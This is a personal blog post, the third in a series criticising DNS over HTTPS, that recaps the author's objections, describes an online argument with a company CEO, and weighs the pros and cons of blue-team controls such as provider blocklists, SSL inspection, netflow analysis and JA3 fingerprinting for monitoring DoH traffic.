DNS over HTTPS Part 3: Accidents are on purpose

So this is the third post in my DNS over HTTPS series. I’m going to try and make it the last one. If you’re new here, you can check out part 1 and part 2 on your own, or you can read the TL;DR summary of the story so far that I’m about to vomit all over this post.

The Story So Far

Its the best story so far. I promise.

I’m concerned about DNS over HTTPS. I think it is a flawed solution that, at best is a baby step forward for privacy of DNS data in transit, and a massive step backward in practically every other aspect.

– I provided a brief history of the internet and why DNS exists.

– I argued that DNS logs and data are vital for identifying threats to users, assets, and data I’m charged with protecting, as well as being vital for network engineers to pin down the root cause of network performance problems. Taking this data source away is a massive visbility blind spot, but thats okay because privacy.

– I expressed concern that a handful of entities decided that DNS over HTTPS is the way forward in a very short amount of time and because of the stranglehold most of them have on the internet in some way shape or form, in addition to the “cloud revolution”, we are hearkening back to the “good old days” of the 70’s and 80’s. Mainframe centralized services, and every action you take on those systems being billable. But its okay. Because now you don’t have to manage it.

– I continued to express concern over this consolidation of services and computing resources, stating that they impact the reliability/availability of various internet services. Its like putting all of your eggs into one basket, only you sometimes know which basket your eggs are in, and if the basket has a service outage, nobody really acknowledges it until about five hours later. If the basket drops all of your eggs, then its considered an acceptable loss.

– I pointed out that a lot of the recommended “privacy respecting”, “secure” DNS services actually declare in their privacy policies that they’re logging your queries. When it comes to accountability of this “respecting privacy”, All I have is the promise of several companies who have track records of invading privacy and/or rolling over for governments, intelligence communities, LEO, and sometimes, people who just hand them wads of money. Some providers allege that they are audited to ensure the data is being removed and/or redacted properly, but if information security has taught me anything, audits only mean respecting the letter of the law, not the spirit.

– I expressed annoyance that DoH is essentially a “Rules for Thee, but Not for Me” service, in that I’m no longer allowed to have DNS logs, but these companies with really shitty track records who don’t give a shit if you need those DNS logs are allowed to know all about where you’re going. That its okay because you can trust them. They say that they’re good people.

– I continued ranting in part 2, tearing apart the EFF’s endorsement of the protocol, and analyzing the implications of the RFC itself.

– EFF says because DNS isn’t encrypted, that its vulnerable to be inspected, and tampered with. This is a half-truth. You’re afforded some small amount of confidentiality and integrity in transit, but once the query hits the DoH server, you’re just choosing to place your trust in another entity and hoping for the best. Because that’s how the internet works. At some point, you have to agree to allow someone else to handle your data. You can’t build a zero-trust network out of a network that is inherently built on trust.

– With regards to tampering with the connection, unless I am in a position to intercept the query (MITM), NOT impact network service, and surreptitiously “beat” the response time to the real DNS server you are attempting to reach (which would involve spoofing the DNS server you’re trying to reach, spoofing the same src/dst/ and the ID field perfectly, BEFORE your packet can reach the legitimate DNS server), the chances of me being able to tamper with your DNS queries in transit is pretty low — at least not without you noticing something. There are plenty of tools for doing MITM over a local network (e.g. ARP spoofing, etc.) but doing it over the internet, and with no one noticing is really fucking hard, and situational at best. See also: QUANTUM

– I point out that the RFC has zero use cases for privacy. The only two use cases afforded are preventing on-path devices from interfering with DNS operations (which arguably I guess it does that), and exposing DNS directly to browser APIs.

– I talk about how I’m disappointed with DoH because instead of formulating their own protocol and registering their own service port, they chose to piggyback on HTTP, SSL, and port 443. I believe this is core to their use case of preventing on-path devices (like, say, firewalls) from being able to “interfere” with DNS operations. I mentioned how I’m concerned that abuses of the protocol were not considered, and pointed out how there were already two malware campaigns abusing the protocol.

– I mention how DoH isn’t some magic protocol, its essentially DNS over TCP, Wrapped in HTTP, Converted to Base-64, JSON formatted, and wrapped in TLS. I talk about how doing all of these things introduce performance penalties on a very time-sensitive protocol, not to mention how HTTP/2 has to do a bunch of complicated shit to approach the performance of plain DNS over UDP. This means there is potential for bugs due to code complexity, and reintroduction of old vulnerabilities in order to “optimize” DNS for HTTP caching. I also acknowledge that regular DNS over UDP has a few exploitable weaknesses, namely in the form of spoofing that leads to Denial of Service attacks.

– The EFF shares my sentiment on how consolidation of a core internet service into a few hands is a problem, and how that leads to the possibility of censorship and/or something of a privacy problem in and of itself. The solution? Tell everyone (including your ISP, who can now legally sell your DNS data for profit) to run DoH servers. They have absolutely no incentive to do this. Also they should promise not to censor or sell the data. okay? I expressed concerns that trusting people who have a bad track record of abusing trust is a bad play.

– I expressed concerns about the second use case of the DoH protocol, and exposing DNS /directly/ to browser APIs, and how in combination with how effective browser fingerprinting is in this day and age has the potential to MASSIVELY violate your privacy. This use case could easily be abused to track your browsing and web habits with unparalleled effectiveness. I speculated a number of reasons on why the companies and organizations pushing for DoH might have vested interest in web browsers being DNS-aware. Namely when it comes to tracking and advertising, and how ad-blocking is seen as a nuisance to most content providers today, and how this may be the solution none of us actually want, but of course they want, because money.

– I pondered the wisdom of Google and Mozilla, and their desire to make DoH the default in their browsers, choosing to override the system configured DNS service and/or defaults. I also rambled about how browsers are a monoculture now with Mozilla and Google controlling essentially the entire browser market, now that Microsoft has decided that their browser should be built on Chromium. I reminisced about a time where if software changed the OS defaults or otherwise hijacked/replaced system services, it was considered malware. But now its okay. Because Mozilla and Google are doing it. I mean, the software is signed, right?

The Last Few Days Have Been Fun

So originally, this blog post was just going to be a summarization of everything I soapboxed about, and then I was going to talk about what I think is the DoH abuse playbook for the blue team. But well, things happened, like my blog getting cited in a Wired story about the DoH debate. I also got a lesson in what cypherpunk is, and got in a pissing match with a CEO and oh man, was that a joy.

What ended up happening is that I continued to voice my concerns about DoH being a lateral movement at best, and just moving the goalposts of trust to companies and organizations who really don’t deserve it. This ruffled some jammies, because apparently if you don’t support crypto all the things, its WHY DO YOU HATE PRIVACY BRO?

I had one dude tell me (I’m paraphrasing here) that DoH and Cloudflare is “Cypherpunk”. I uh. I don’t know about that. I had to look up the definition of cypherpunk.

a person who uses encryption when accessing a computer network in order to ensure privacy, especially from government authorities

https://www.google.com/search?&q=define%3Acypherpunk

Using encryption doesn’t, by default, make you safe from government authorities. Trusting in organizations who are okay with giving your contact information to abusers, kow-tow’ing to repressive government regimes, and running services for hate sites, assuming that they’re going to keep you safe from government authorities is a bet that I’m not okay with.

In any case, going back to the conversation with the CEO of Cloudflare. As always, It was a twitter fight, because twitter is for shitposting and drama. So lets post some screencaps.

So, most of the time I have a rap on twitter for being a shitposter and a troll. I guess its a fair moniker. But I do have a passion for information security. It is my profession, and something that I do. So I take discussion about it somewhat seriously, if people approach me with concerns somewhat seriously.

Security is srs bzns.

This was a conversation that chained off of the discussion about Cypherpunk and blindly trusting Cloudflare, among others. Matt asked me that since the source IP address is not present when querying recursively, where is privacy violated. I cited the RFC, saying that DNS query information is exposed directly to the browser API. Nothing stopping a website you’re visiting from asking for this information. I continue by voicing my concerns that abuses of this protocol were not considered during its creation and are still not being considered for its current implementation.

The response was more or less downplaying my concerns in a patronizing manner. Which, I would expect from any other troll any other time, but probably not the CEO of a billion dollar company with a net worth of over 200 million, trying to win trust (but more importantly, marketshare! Follow dat mon-e). But I guess downplaying critics is to be expected when you’re trying to establish your own stranglehold on the internet. Can’t let people question the narrative that our VPN that totally isn’t a VPN, and our privacy respecting DNS service are both Actually Good For You(tm).

Maybe its karmic retribution for being a shitposter. Who knows. But for now I’m just considering it another data point that they don’t give a shit about the concerns, just the marketshare and the money.

So, What’s My Playbook, Chief?

I’ve more or less accepted that DNS over HTTPS is coming. Regardless of whether or not I want it, like it, or agree with it. That doesn’t mean that I have to take it silently. As a security analyst, and blue teamer, it will be my job, as always, to figure out how to monitor it, control it, and mitigate its abuses. I don’t have a choice in the matter, and the powers that be have made it clear, so what can I do to stop it?

As an exercise, I’m going to try and enumerate all of the controls I would consider for controlling, blocking or otherwise inspecting DoH, and how they all are stop-gap and situational at best.

Curl wiki DNS over HTTPS provider list

Pros: The curl wiki has a DNS over HTTPS provider list. You could potentially use this to blacklist DoH providers and severely limit DoH services in and out of your network

Cons: Its blacklisting. Blacklists are brittle, but they do one thing and one thing only: identify known bads. Unfortunately, there’s not much this would do if the bad guys stand up their own DoH server. You’re probably thinking to yourself: DoH servers require a plain DNS query to bootstrap, or resolve the DoH server’s domain to kick things off. In normal circumstances where you’re assuming that its your average user trying to bypass security policy, and not some advanced threat, you’re right. However the paranoia in me tells me it’d be trivial for a sufficiently advanced actor to just put their DoH provider into the DNS cache, or edit the HOSTS file to point to their DoH server to do whatever it is they need to do, then to cover tracks, just remove their entry from the HOSTS file or DNS cache.

Other thoughts: As shitty as blacklists are, If you block access to the most common DoH providers, a lot of the low-hanging fruit gets handled as well, or in the worst-case scenario, may potentially fall back to standard DNS. Recently, I discovered at work that Palo Alto allegedly does app detection of DoH, but based on this article, I’m under the impression they’re doing blacklisting. You could achieve the same level of effectiveness with a Snort or Suricata DNS rule looking for queries to the domains google, powerDNS, and cloudflare host their DoH services on to catch the initial plain DNS query bootstrap.

SSL Inspection

Pros: SSL Inspection, or as some others call it, SSL MITM is essentially establishing your own CA, creating a certificate, pushing it to clients under your control to trust it, placing the MITM system/proxy in a place where it sits between the SSL sites your clients want, and the clients themselves and it more or less “bridges” the SSL connections between the internet and your clients, but is able to collect the plaintext, or forward the plaintext traffic to other network devices/processes for inspection. Sometimes, this is called an SSL terminating proxy, because essentially has to handle SSL negotiation, setup and termination between the client and the server endpoints to work effectively.

Source: https://www.symantec.com/content/dam/symantec/docs/other-resources/responsibly-intercepting-tls-and-the-impact-of-tls-1.3-en.pdf
Note: Ignore the verbiage, focus on technical aspects. Notice how there are two TLS sessions one from C(lient) to TIA (intercept proxy), and TIA to S(erver)

This is one way of doing it, and with TLS 1.3, and EC-DHE key exchange being used for TLS session setup, and TLS1.3 being able to detect when something is trying to downgrade to TLS1.2 (or earlier), its the way that still actually works and really, its all you need to know. You can look into passive SSL decryption if you wanna learn the old ways ™.

Having visibility into TLS streams lets you see everything. This means being able to see DoH communications, logging them, and being able to parse them. It also means being able to see other TLS comms, and everything that comes with it.

Cons: SSL Inspection is expensive in every sense of the word. Politically and Socially, privacy advocates will ruin your shit if you say that you are in support of it. The “WHY DO YOU HATE PRIVACY, BRO?” super team will be out in full force, asking if you like to kill cyber puppies while you’re at it. Privacy advocates will compare you to oppressive regimes around the world, even if you point out that you have a responsibility to defend the network, the users, the assets and the data. Even if you point out that the users have no reasonable expectation of privacy using assets they don’t own, with endpoint security software watching them, utilizing network access that isn’t theirs, either. But that’s not including the pressure you’ll get from inside your org. Imagine C-suite knowing that you know exactly what Xhamster videos they watch, and when they watched them. That might rustle the jimmies of those who believe that the rules of Acceptable Use don’t apply to them.

Ceiling Admin knows your fetishes and wishes to god they didn’t.


Not only is it politically/socially expensive, its monetarily expensive. Some network security appliances claim they can do SSL inspection in addition to a host of other functions, but normally if you turn on SSL inspection with the rest of those functions, it tanks performance, because its extremely expensive system performance-wise to maintain essentially two SSL connections for one client trying to reach out to something over the internet. Not to mention needing the resources and I/O to log the plaintext somewhere while you’re doing all of this, in addition to the fast storage to hold all of it as it comes. That means you need money for beefy boxes to handle the TLS, and fuckhueg fast disk arrays to handle logging the data, and probably either time to write a parser for DoH logs for ELK, or money to pay someone to do it for Splunk, or whatever SIEM you use to make the data usable.

Finally, its expensive security-wise because if you mismanage it, and/or don’t secure access to the decrypted logs, the certificates and/or the private keys, the bad guys can simply collect the decrypted data for their own uses. This is called “Third Party collection” or letting someone else do the heavy lifting for you, and reaping the benefits. Often times this means adding exceptions to what gets inspected to make sure you aren’t logging credentials to say, banking websites, or social media.

Other Thoughts: To my knowledge as of today, no open-source or freemium SSL MITM suites actually support TLS v1.3. I thought that Polarproxy might, but they just force downgrade to TLS v1.2. Not to mention its “freemium” software. You can decrypt up to 10,000 sessions a day, but beyond that, you gotta pay. And chances are, if you have to ask how expensive it is, you probably can’t afford it.

Netflow, conversation size, and frequency analysis to find unauthorized DoH servers

Pros: Netflow, for those of you who are unfamiliar with the term is more or less a network inspection data source that tells you metadata about a connection, but doesn’t actually perform deep packet inspection. A lot of NSM software packages collect netflow-like data. E.g. Suricata calls them flow records, where as Zeek/Bro calls them connection logs. With these logs, I know who was involved (IP addresses), what time the connection started, the end time, the length of time the connection spanned, what transport protocol was used (e.g. TCP, UDP, ICMP, etc.), the src/dst ports (if TCP or UDP was used), how many packets were transferred by both the session initiator (usually the client) and responder (usually the server), and how many bytes were transferred by both sides. There is a lot of information you can glean about a connection without actually inspecting the contents. The task here would be applying this metadata collection to https connections to be able to reliably detect DNS over HTTPS comms.

This is a screenshot from “ntopng”, another network flow monitoring suite. Netflow data is incredibly powerful.

If this can be done reliably, this could serve as a surefire detection method. Imagine being able to look at collection of netflow records and reliably being able to determine that DoH was being used. You can probably do frequency analysis to detect rogue DoH usage (e.g. “I wonder why we have so much HTTPS communication to these IP addresses, and when I navigate to them there is no content, or content related to using it as a DoH server. How funny.”) You might also be able to find bad actor DoH via least frequent occurence (e.g. “There are a handful of connections to this IP address over HTTPS. The connections are small, short-lived and only a few clients seem to be connecting to it. Also the server doesn’t seem to exist anymore. I wonder why that is.”). You might also be capable of figuring out what TLS comms are DoH by doing size analysis of the conversation. The client requests, and the server responses should be small. Frequency of the connections ultimately depends on how many resolutions the client is attempting, but if its rogue DoH usage, there should be a lot of small, short-lived connections in rapid succession.

Cons: While a lot of the analysis I’m recommending could probably be done given enough time, testing, and patience, I feel like this doesn’t fall into security operations easily. Its not standard and repeatable. Its prone to error, meaning it can’t easily be automated (parts of it could potentially be automated, but not the whole thing) and will require human analysis to make determinations. For example, there are plenty of other web applications that communicate over HTTPS that have numerous small, short-lived connections.

This turns it into a threat hunting operation, and not so much something you can generate repeatable, rapidly actionable alerts on, like say, endpoint protection signature alerts, and/or IDS/IPS alerts. Not a lot of organizations have the time, resources, or maturity to be performing hunt operations, making this a super difficult pill to swallow. The long and short of it is that its possible, but pretty difficult.

Other thoughts: This is probably one of the few ways forward I can see for being able to detect rogue DoH abuse “reliably”. Whats even better is that security controls are cumulative. You could easily pair up netflow analysis/hunting with operating a blacklist of known DoH providers. No one security control is a silver bullet, but every road block or mitigation you put up helps. I plan on working on this in the lab to see how feasible flow data analysis for finding DoH actually is.

JA3/JA3S (AKA SSL Fingerprinting)

Pros: You’re able to identify what SSL HELLO messages from a client look like, and what the SSL HELLO from the SSL server implementation the DoH server is sending back to that given client.

Cons: This is more or less useless for actually controlling DoH connections, and more about fingerprinting clients and servers. As it turns out, a lot of the DoH providers have a massive amount of servers that are identically spec’d, configured, and provide support for the same ciphers, when sent the same SSL HELLO from a given client.

So lets say you were gonna try to use a JA3S fingerprint for detecting when your clients access a DoH service from say, a large cloud provider. You somehow managed to configure something to block traffic when this JA3S fingerprint is encoutered, or (more sanely) configure it to alert you when encountered. You could potentially end up alerting when your client systems attempt to access anything from this cloud provider/CDN, or huge parts of it, if the same SSL HELLO response is sent from the majority of CDN servers.

Lets say you went the opposite route and wanted to use JA3 client SSL HELLO fingerprinting. Lets also say that you use Mozilla Firefox ESR, and you want to alert when you encounter the JA3 fingerprint of the client making a DoH request. You’ve effective identified when your clients running on firefox are making any SSL requests at all. Not very useful for our purposes, but there are some implications there that I may consider writing about in the future.

JA3 is more about service and client fingerprinting more than it’d be about me fingerprinting what DoH comms in particular look like. Worthless for what I’m trying to achieve, but not altogether worthless..
Source: https://www.ntop.org/ndpi/tls-ssl-analysis-when-encryption-and-safety-are-not-alike/

Other thoughts: I was spitballing ideas when I thought about JA3/JA3S. I thought it was hashing SSL certificates or something like that. I didn’t actually realize what JA3 hashes tracked until I read more about the spec. Also, why in heavens name would you choose MD5 as the hash type in this day and age?

We do as we Always Have: Take out the Trash

As I have stated before, DoH is here to stay. That doesn’t mean I have to lie down and take it, because some dudes out in Silicon Valley with the money, clout, motivation and the will to back yet another consolidation power play said ‘deal with it’. Well, I’m dealing with it, just not in the way you expected. I’m a computer janitor, and I’ll do what I have always done: take out the fuckin’ trash.

I was originally going to post Walter from Hellsing here, but turns out that he sides with the Nazis. I was then going to use Sebastian from Black Butler, but I’m not actually Satan. So Trashterpiece dumpster fire it is.

In the past decade or so that I have spent in information security, the majority of that has been spent on the blue team. Those dudes who are tasked with rigging together a bunch of shit to keep the users, the companies, the assets, and the data safe from the many terrors and under-baked concepts of the internet.

You can tell the users to watch out for themselves, but in the end, even trained professionals can fall for social engineering, and user education is woefully inadequate. Not because the users don’t listen, but because nine times out of ten, it’s useless template cookie-cutter bullshit mandatory training that makes absolutely no effort to try and relate to the user community and why we need their help to do our job effectively.

Because of this inability to relate to our users and relate our job function to their job functions, we often get asked by the users why should they be doing our job for us, and honestly, that onus lies on us, for being terrible at communication, empathy, and assuming the users who have other job functions to perform are stupid.

You’re probably wondering what the hell user awareness and social engineering have to do with DoH and the huge potential for abuse it has being considered a ‘deal with it’ afterthought, and I’m here to tell you: more than you think.

Most adversaries score their initial access by convincing a user that they are someone they are not, or to trust in something that they should be questioning. DoH is just another abusable protocol that is inevitably going to used for C2 once the bad guys get them to click the phishing link or attachment.

A lot of the protocols, software, and applications floating around on the internet were wrought with the best intentions, but without thinking of the consequences of abuse. After all, the internet, and a lot of the technologies that rely upon it, are built with this inherent idea of trust. You have to trust carriers to not tamper with your data in transit. You have to trust ISPs and backbone providers to peer with one another so your data gets from source to destination. You have to trust others with your data at some point, encrypted or not. If they don’t carry it, it doesn’t reach the destination.

DNS over HTTPS wasn’t the only way forward. Considering that privacy isn’t mentioned at all in the DoH RFC, and one of the two main use cases for DoH were for ensuring integrity of DNS data in transit, DNScrypt would have easily met the integrity in transit goal, and/or DNSSEC would have provided better integrity in transit, as well integrity and authentication of the records recovered. DNS over TLS would have been an implementation that provided users the capacity to choose whether or not their networks opted in to the protocol, instead of saying “lol, its now the default in your browser, uses HTTPS, and since browsers are a monoculture, you have no choice but to accept it. Or do you hate privacy, broh?”

The only other use case mentioned in the DoH RFC was to expose DNS directly to the browser APIs, and that should terrify you, and seriously make you worry for the privacy of your browsing data.

I’m not saying any of those other ideas for DNS were perfect, or that they didn’t have their issues and flaws. What I’m saying is that we had choices, and these large entities consolidating what defines the internet took that away with their leverage. My soapbox isn’t as big as theirs, but self-hosting allows me to have a soapbox all the same. So if I have to fuckin’ deal with it, I’m going to make you suffer every step of the way, and let you know that I’ll be the one watching for and considering the abuses, even if you aren’t.